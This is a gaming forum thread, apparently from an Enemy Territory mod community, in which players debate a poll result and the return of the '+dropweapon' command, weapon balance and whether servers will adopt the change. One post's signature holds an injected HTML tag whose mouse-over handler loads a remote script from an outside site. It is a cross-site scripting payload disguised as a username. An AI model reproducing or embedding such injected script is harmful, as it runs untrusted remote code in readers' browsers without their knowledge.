*cries for +dropweapon*
=FF=im2good4u

Post by =FF=im2good4u »

BranMuffin wrote:I wanna vote yes!!!

*cries for +dropweapon*
that answer was already decided :)
Svartberg

Post by Svartberg »

Huh ? There were more no votes than yes votes yet it's still going in ?! what kind of a poll is this ?

Even before making this kind of poll it was obvious it would be a close call, so basically this feature was already planned to go in ?

Oh my, I'm so against this feature.
Rain

Post by Rain »

Svartberg wrote:Huh ? There were more no votes than yes votes yet it's still going in ?! what kind of a poll is this ?

Even before making this kind of poll it was obvious it would be a close call, so basically this feature was already planned to go in ?

Oh my, I'm so against this feature.
bani wrote:because there was not a strong preference for or against, +dropweapon is going in. but with the following caveat:

you won't be able to +dropweapon to switch heavy weapons faster after firing. this will totally demolish the argument against +dropweapon "because it would make panzerfaust soldier too unbalanced".
Still vehemently against +dropweapon?
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
Svartberg

Post by Svartberg »

Rain wrote: Still vehemently against +dropweapon?
Well, i read all the posts before posting mine.
Personally i think this will only flatten something in this game some other shooters seem to suffer from.
Throwing your gun and picking another makes your life easier, but if you look at it in a broader perspective - ET is a team oriented game, getting your team supplied with ammo is part of the game, and when the team is suffering from a shortage of ammo, i think it's nice they made it a little tricky to pick up the enemies guns, there's nothing like a free launch.

Further more, it will enforce smg players while on he opposite weakening the others.
For example a cov-op won't find this as useful as the smg guys, so basically the smg classes are going to have a more convenient access to ammo and further down their advantage.

I played rtcw and i played et, and yes i used to use this feature a lot, but even though my life is harder now, i like what they did - the dropweapon never seemed to make much sense as it was.

The serious thing i think made people to raise this debate at the first place, was the weird area you need to click in order to pickup weapons, people sometimes find themselves trying to pick weapons for hours =\

Well i know it's bani mod, and i know he alone decides if he wants to put something or not, but i still think it's something a lot of people would not like to see in the pro servers.
O2.iceman

Post by O2.iceman »

When i first started reading the thread, I was against +dropweapon because I didn't want to make the PF soldier any stronger than it already is. Once they get to level 1 they can fire every 8-10 seconds.. Sometimes the 2 seconds while they are switching weapon is the only time you get to kill a soldier who's camped somewhere and they just missed splatting you.

However bani's compromise has changed my mind, if +dropweapon can be used by all classes except the soldier (to bypass weapon switch time), then I'm happy for it to come in.
O2.iceman
Oxygen
Kendle

Post by Kendle »

I don't think this will have as dramatic an impact as it might have done, with the decision to ensure Panzers can't exploit it to switch weapons quickly (which is the main thing it was used for in RTCW), but I'm with Svartberg on this.

One of things ET has done successfully is make the SMG Classes less powerful. This is a good thing as it makes the other Classes / Weapons that bit more attractive. I've often campaigned for changes to be made to ET which, on the face of it, make it more like RTCW, but this is one of the things RTCW got wrong, and ET got right. Not a welcome change IMO. :(
tauie

Post by tauie »

Yes yes yes yes yes! Drop weapon!
Threshold

Post by Threshold »

tauie wrote:Yes yes yes yes yes! Drop weapon!
Nm the vote is closed.. read up....
=FF=im2good4u

Post by =FF=im2good4u »

Threshold wrote:
tauie wrote:Yes yes yes yes yes! Drop weapon!
Nm the vote is closed.. read up....
i think he was jsut celebrating
Spark2

Post by Spark2 »

There was no response yet on whether it will be possible to switch weapons by just walking over them.
I think I adressed my problems[1] with this quite clearly. There is no reason to allow this, if your intention was really the tactical element of dropping ammo (as Bani repeatedly claimed). If you allow it, you will unnecessarily change the way how weapon switching works in the game (back to old way which we used for years) and you would admit, that the tactical possibilities in fact weren't the only intention behind this change, but that you wanted your easy weaponswitching back.
This would be incredibly ironic considering that Bani flamed us for beeing afraid of change, so I'll give him the benefit of the doubt.

I'm sorry for making such a fuss out of a seemingly small detail, but this would (pratically) kill one part of the game which makes me like it so much. You guys carry a huge responsibility as the only active tournament mod which got the sourcecode. So please take any reasonable objection seriously... At least when you are going to change the gameplay (not optional).
uber-noob

Post by uber-noob »

It's plain simple. If a version with dropweapon will come, without the possibility to deactivate it (I voted no), it will never make it on the servers where I'm admin. In this case I would rather get back to main.
Svartberg

Post by Svartberg »

uber_noob wrote:It's plain simple. If a version with dropweapon will come, without the possibility to deactivate it (I voted no), it will never make it on the servers where I'm admin. In this case I would rather get back to main.
Well said.